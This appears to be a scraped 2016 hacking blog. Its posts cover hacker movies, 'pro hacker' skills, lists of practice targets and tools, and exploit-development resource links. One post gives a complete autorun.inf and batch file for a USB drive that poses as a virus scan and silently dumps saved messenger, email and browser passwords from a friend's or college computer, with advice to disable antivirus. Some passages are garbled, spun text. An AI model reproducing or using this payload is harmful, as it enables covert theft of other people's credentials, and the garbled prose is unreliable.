Thursday, March 10, 2016

The Top 10 Best Hacker Movies

As of late, Hollywood has taken a sparkle to programmers, with programmers showing up in verging on each heist or puzzle motion picture now. This can be both great and terrible for our calling. As we probably am aware, whichever way Hollywood chooses to portray our calling is the manner by which a great many people will see it.The good news is that not all of Hollywood’s depictions of hackers are negative, despite the overwhelming perception by the masses that our profession is a malicious one.

In trying to determine the ten best hacker movies, I tried to only use those films where people are actually entering into other peoples’ or organizations’ computers for good or ill. Very often, reviewers of this genre include any movie with computer “stuff” as a “hacker movie.” In my definition of a hacker movie, someone must be using advanced skills to access someone else’s computer, without their consent or knowledge, for good or ill.

Takedown


Takedown (also known as Trackdown) is a B-grade movie—a fictionalized and sensationalized account of the tracking and capture of probably the most infamous U.S. hacker, Kevin Mitnick. Based upon the book and written by his nemesis, Tsutomu Shimomura, the story tends to glorify Shimomura. Mitnick operated in the 1980s and ’90s and eventually went to prison for a couple of years. Now, he is a highly paid IT security consultant, speaker, and writer.
This movie has low production values, despite having some relatively well-known actors (Skeet Ulrich, Tom Berenger, and Amanda Peet, among others). Don’t expect to learn much hacking from this movie, though, as nearly the entire 1 hour and 36 minutes is a story about tracking down Kevin Mitnick as the FBI and Shimomura searches for him across the states.

Swordfish

In Swordfish, Hugh Jackman plays a retired, elite hacker who has been released from a long prison term and is now working in the oil fields and living in a trailer. He is approached by an organized crime figure played by John Travolta, and is forced to do one last hacking job against his will.
Unfortunately, the hacking is forgettable and far from reality. Jackman’s character is seen breaking into highly secure systems within seconds, while gyrating geometric objects appear on his screen. Very little depiction of the actual hard work that goes into hacking is seen, and they make it look like a computer game.
The most memorable part of this movie is Halle Berry’s topless scene. Although it has nothing to do with hacking, it does make this movie memorable.

The Italian Job

Although the MINI Coopers are really the stars of The Italian Job (a remake of the 1969 film of the same name), Seth Green plays Lyle, a hacker among a group of elite thieves, who is able to manipulate traffic signals, among other devices, that make this grand theft possible. Could this hacker have been using Shodan to identify and assist in hacking these devices?

Wednesday, March 9, 2016

How To Become A Pro Hacker: 5 Hacking Skills You Must Require

Every person who is attached to the technology and technical websites are aware with the term Hacker. The term applied to the person who uses his computer and laptop to access the unauthorized data. Learn about hacking and trying it is not a crime unless you are doing it in order to get unauthorized access to any data. You can use it for your security as well so that others can’t hack you. If you think hackers only hacks into networks and steal data, then you are wrong in that part. The main motive behind providing hacking courses and its learning to the people, who are interested to become hackers and are ready to tackle with other hackers who are not using their skills nicely. So today I will tell you about 5 hacking skills which will show you how to become hacker. Because if you want to become a pro hacker you need to beat one. So check out these skills below
5 Skills Required To Become A Pro Hacker
1. Basic Computer and Networking Skills
  

Basic knowledge is the base of any knowledge. If you know about the basic functions of your computer and if you can easily register and set your own networking parameters on your windows, it will definitely help you while you are learning hacking. Every person who wishes to become a hacker will have to understand these networking skills:
IPv4, IPv6, DHCP, NAT, Subnetting, DNS, Routers and switches, VLANs, OSI model, Public v Private IP, MAC addressing, ARP.
These skills will definitely help them to grow their hacking capability.
2. Linux Skill and Wireshark


Hackers love Linux OS. We can say that Linux is the favorite operating system of hackers. The hacking tools we used on the Linux are specially made and developed for hackers. Linux provides an open source platform and free operating systems for hackers which windows doesn’t provide. That’s why hackers use Linux. To know more about Linux, Click on the link below.
On the other hand, Wireshark is free software used for educational purpose, network troubleshooting, software and communications protocol development as well as for the analysis. It is actually an open source packet analyzer.
3. Virtualization And Security Concepts
The meaning of virtualization is that you need to make a virtual version to test your hacking skills before go live. You can do this by making a virtual version of the operating system, storage device and server or network resources. If you want to become a pro hacker you have to learn these security concept skills like Secure Sockets Layer (SSL), Public Key Infrastructure (PKI), Intrusion Detection System (IDS), Firewalls and so many more. Your strong hold on security will let you control barriers set by security Admin.
4. Wireless Technologies and Scripting
The most popular thing on the hacking is how to hack a wifi. People who wish to hack a wireless network or devices must have to understand all of their functions. For that they need to learn professional encryption algorithm like WPA, WEP, WPA2, WPS and the 4 way handshake. On the other hand Scripting is the most important skill if you need to become a pro hacker. Sometimes hackers use other hackers’ tools to hack something. By doing that, they got dis- rated for using those tools. So you need to make a new tool which you can use to cope with hackers. Security Admin does that when any hacking attempt happens on their server.
Database and Web Applications


With the help of big DBMS like Oracle and My SQL. You will able to access or hack databases on the other computers. The Database is the collection of data present on the computer and can accessible with so many ways. Whereas Web Applications is the software which you can use on the internet with your web browser. You will be able to do anything if you will find out the functioning of all the web applications and the database backing them.










 


 
 

Monday, March 7, 2016

Hack Password Using Pen Drive.

Today I will show you how to retrieve/hack passwords using USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and a USB Pendrive you can create your own rootkit to retrieve/hack passwords from your friend's/college Computer.

You will need the following tools to create your rootkit.
Click on their name to download them.

  1. MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger,Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
  2. Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
  3. IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0, v6.0
  4.  Protected Storage Pass View: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
  5. PasswordFox: Password Fox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field,Password Field, and the Signons filename.
Note:All the software with which you are going to make rootkit might not work on few computer due to uncompatibality with micro-processor or may generate false alet like viruses.These softwares are 100% virus free but when they try to recover password,antivirus restrict this process for security measures resulting in to false alert.

Here is a step by step procedure to create the password retrieving/hacking pendrive toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.


1. Download all the 5 tools.To download,click on the name of software.
Extract them and copy only the executables (.exe files) into your USB Pendrive .i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Pendrive.

2. Open Notepad  and copy the following text into it.
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from
"New Text Document.txt" to autorun.inf
Now copy the autorun.inf  file onto your USB Pendrive.

Open cmd,navigate to your pendrive,to navigate in your pendrive type "d:" and hit enter,where "d" is drive name.Then type this commands "attrib -s -h *.* /s  /d".This will hide all the data in your pendrive.

3. Again open Notepad file and copy the following text onto it.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Save the Notepad and rename it from
"New Text Document.txt" to "launch.bat".
Copy the "launch.bat"  file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the
passwords. You can use this pendrive on any computer to sniff
the stored passwords.

Just follow these steps to retrieve/hack password.

Step 1:-  Insert the pendrive and the autorun window will pop -up(This is because, we have created an autorun pendrive).
Step 2:- In the pop-up window, select the first option (Perform a
Virus Scan).
Step 3:- Now all the password recovery tools will silently get executed in the background (This process takes hardly a fewseconds).The passwords get stored in the .TXT files.
Step 4:- Remove the pendrive and you'll see the stored passwordsin the .TXT files.

This hack works on Windows 2000, XP,till now i have not tested it on windows 7,so try it if you can and then give us feedback.

Warning: This procedure will only recover the stored passwords (if any) on the Computer.

NOTE:These software are used to recover passwords from windows,its the redesigning and creativity that we made it into a auto-executable program to recover password silently without anyone knowledge.



NOTE:TRY THIS AT YOUR OWN RISK.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.THE ABOVE INFORMATION IS FOR EDUCATION AND RESEARCH PURPOSE ONLY.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE TRICK.

Vulnerable Web Application Lists For Learning Pentest

Here's a list of Vulnerable Web Application sites for learning Penetration Testing,  you can legally scan / "attack" to exploit. They are mostly hosted by security companies as "target practice".


No. Vulnerable Application Platform
1 SPI Dynamics (live) ASP
2 Cenzic (live) PHP
3 Watchfire (live) ASPX
4 Acunetix 1 (live) PHP
5 Acunetix 2 (live) ASP
6 Acunetix 3 (live) ASP.Net
7 PCTechtips Challenge (live)
8 Damn Vulnerable Web Application PHP/MySQL
9 Mutillidae PHP
10 The Butterfly Security Project PHP
11 Hacme Casino Ruby on Rails
12 Hacme Bank 2.0 ASP.NET (2.0)
13 Updated HackmeBank ASP.NET (2.0)
14 Hacme Books J2EE
15 Hacme Travel C++ (application client-server)
16 Hacme Shipping ColdFusion MX 7, MySQL
17 OWASP WebGoat JAVA
18 OWASP Vicnum PHP, Perl
19 OWASP InsecureWebApp JAVA
20 OWASP SiteGenerator ASP.NET
21 Moth
22 Stanford SecuriBench JAVA
23 SecuriBench Micro JAVA
24 BadStore Perl(CGI)
25 WebMaven/Buggy Bank
26 EnigmaGroup
27 XSS Encoding Skills
28 Google – Gruyere
29 Exploit- DB Multi-platform
30 The Bodgeit Store JSP
31 LampSecurity PHP
32 hackxor Perl(CGI)
33 OWASP – Hackademic PHP
34 Exploit.co.il-WA PHP
35 crackme.cenzic.com PHP
36 hackthissite.org

If you know other legally web applications for learning, please mention bellow. We will update it. And let us know if there are any links are dead.

100 best hacking tools

as you all know about hackers,but let us clear here first that using hacking tools doesn’t make you a hacker.you will be called noob in the hackers world.always remember hackers doesn’t  use hacking tools but they build hacking tools.
so we are brought 100 hacking tools that can help you in hacking.PORT SCANNERS
1. Nmap 2. Superscan3. Angry IP Scanner
 PASSWORD CRACKERS
4. Ophcrack

5. Medusa

6. RainbowCrack

7. Wfuzz

8. Brutus

9. L0phtCrack

10. fgdump

11. THC Hydra

12. John The Ripper
13. Aircrack
 PACKET SNIFFERS
14. Wireshark

15. Tcpdump

16. Ettercap

17. dsniff

18. EtherApe 


VULNERABLITY SCANNERS



19. Nessus

20. OpenVAS

21. Nipper

22. Secunia PSI

23. Retina

24. QualysGuard

25. Nexpose


WIRELESS HACKING
26. Aircrack-ng

27. Kismet

28. inSSIDer

29. KisMAC 
HACKING OPERATING SYSTEMS
30. Kali Linux
31. SELinux
32. Knoppix

33. BackBox Linux

34. Pentoo

35. Matriux Krypton

36. NodeZero 
37. Blackbuntu

38. Samurai Web Testing Framework 
39. WEAKERTH4N

40. CAINE (Computer Aided Investigative Environment)

41. Bugtraq

42. DEFT

43. Helix
ENCRYPTION TOOLS
44. TrueCrypt

45. OpenSSH

46. Putty

47. OpenSSL

48. Tor

49. OpenVPN

50. Stunnel 
51. KeePass
PACKET CRAFTING
60. Hping

61. Scapy

62. Netcat

63. Yersinia

64. Nemesis
65. Socat

VULNERABLITY EXPLOITATION

   
66. Metasploit

67. sqlmap

68. sqlninja

69. Social Engineer Toolkit

70. NetSparker

71. BeEF

72. Dradis
INTRUSION DETECTION SYSTEMS
73. Snort

74. NetCop
TRAFFIC MONITORING
75. Splunk

76. Nagios

77. P0f

78. Ngrep
WEB VULNERABLILTY SCANNER
79.Burp Suite

80. WebScarab

81. Websecurify

82. Nikto

83. w3af
ROOKIT DECTECTORS




84. AIDE (Advanced Intrusion Detection Environment)
WEB PROXIES
85. Paros

86. Fiddler

87. Ratproxy

88. sslstrip

FIREWALLS
89. Netfilter

90. PF: OpenBSD Packet Filter 
FUZZERS
91.skipfish
92. Wfuzz
93. Wapiti
94. W3af
OTHER HACKING TOOLS
95. Netcat

96. Traceroute

97. Ping.eu

98. Dig

99. cURL

100. Sleuth Kit

many people install backtrack or kali linux in their systems and using tools they got access and call themselves a hacker,as we have talk with most famous hackers of the world like mauritania attacker ,syrian electronic amry,anonghosts,and other anonymous hackers.
using kali linux doesn’t make you a hacker.as per the famous and professional hackers some of them haven’t using kali linux yet,they are using other operating systems.
meet hackers

Vulnerable Web Application Lists For Learning Pentest

Here's a list of Vulnerable Web Application sites for learning Penetration Testing,  you can legally scan / "attack" to exploit. They are mostly hosted by security companies as "target practice".


No. Vulnerable Application Platform
1 SPI Dynamics (live) ASP
2 Cenzic (live) PHP
3 Watchfire (live) ASPX
4 Acunetix 1 (live) PHP
5 Acunetix 2 (live) ASP
6 Acunetix 3 (live) ASP.Net
7 PCTechtips Challenge (live)
8 Damn Vulnerable Web Application PHP/MySQL
9 Mutillidae PHP
10 The Butterfly Security Project PHP
11 Hacme Casino Ruby on Rails
12 Hacme Bank 2.0 ASP.NET (2.0)
13 Updated HackmeBank ASP.NET (2.0)
14 Hacme Books J2EE
15 Hacme Travel C++ (application client-server)
16 Hacme Shipping ColdFusion MX 7, MySQL
17 OWASP WebGoat JAVA
18 OWASP Vicnum PHP, Perl
19 OWASP InsecureWebApp JAVA
20 OWASP SiteGenerator ASP.NET
21 Moth
22 Stanford SecuriBench JAVA
23 SecuriBench Micro JAVA
24 BadStore Perl(CGI)
25 WebMaven/Buggy Bank
26 EnigmaGroup
27 XSS Encoding Skills
28 Google – Gruyere
29 Exploit- DB Multi-platform
30 The Bodgeit Store JSP
31 LampSecurity PHP
32 hackxor Perl(CGI)
33 OWASP – Hackademic PHP
34 Exploit.co.il-WA PHP
35 crackme.cenzic.com PHP
36 hackthissite.org

If you know other legally web applications for learning, please mention bellow. We will update it. And let us know if there are any links are dead.

Complete Resources About Exploitation Development for Ethical Hackers

Assembly Language:


C/C++:


Python:

Python has a wonderful official documentation, apart from that you can use the following books/courses:


BOOKS



TUTORIALS

Corelan.be

Opensecuritytraining.info

Securitytube.net


Massimiliano Tomassoli’s blog

Samsclass.info


Securitysift.com

Justbeck.com

0xdabbad00.com

fuzzysecurity.com

sploitfun.wordpress.com

sneakerhax.com

community.rapid7.com

resources.infosecinstitute.com

rafayhackingarticles.net

Stack Based Overflow Articles

Heap Based Overflow Articles

Kernel Based Exploit Development Articles

Windows memory protections Introduction Articles.

Windows memory protections Bypass Methods Articles.

Windows Exploits


TRAININGS

Opensecuritytraining.info


Module 12 of Advanced penetration testing cource on Cybrary.it

Securitytube.net

infiniteskills.com



COURSES

Corelan


Offensive Security


SANS

Ptrace Security

Udemy


VIDEOS




TOOLS

  • IDA Pro – Windows disassembler and debugger, with a free evaluation version.
  • OllyDbg – An assembly-level debugger for Windows executables.
  • WinDbg
  • Mona.py
  • angr – Platform-agnostic binary analysis framework developed at UCSB’s Seclab.
  • BARF – Multiplatform, open source Binary Analysis and Reverse engineering Framework.
  • binnavi – Binary analysis IDE for reverse engineering based on graph visualization.
  • Bokken – GUI for Pyew and Radare.
  • Capstone – Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages.
  • codebro – Web based code browser using clang to provide basic code analysis.
  • dnSpy – .NET assembly editor, decompiler and debugger.
  • Evan’s Debugger (EDB) – A modular debugger with a Qt GUI.
  • GDB – The GNU debugger.
  • GEF – GDB Enhanced Features, for exploiters and reverse engineers.
  • hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols.
  • Immunity Debugger – Debugger for malware analysis and more, with a Python API.
  • ltrace – Dynamic analysis for Linux executables.
  • objdump – Part of GNU binutils, for static analysis of Linux binaries.
  • PANDA – Platform for Architecture-Neutral Dynamic Analysis
  • PEDA – Python Exploit Development Assistance for GDB, an enhanced display with added commands.
  • pestudio – Perform static analysis of Windows executables.
  • Process Monitor – Advanced monitoring tool for Windows programs.
  • Pyew – Python tool for malware analysis.
  • Radare2 – Reverse engineering framework, with debugger support.
  • SMRT – Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis.
  • strace – Dynamic analysis for Linux executables.
  • Udis86 – Disassembler library and tool for x86 and x86_64.
  • Vivisect – Python tool for malware analysis.
  • X64dbg – An open-source x64/x32 debugger for windows.
  • SploitKit – a suite of cli tools to automate the tedious parts of exploit development
  • ShellSploit framework
  • ROP Injector

HEAP EXPLOITATION TECHNIQUES



VULNERABLE APPLICATIONS

Exploit-exercises.com



EXPLOITS DATABASE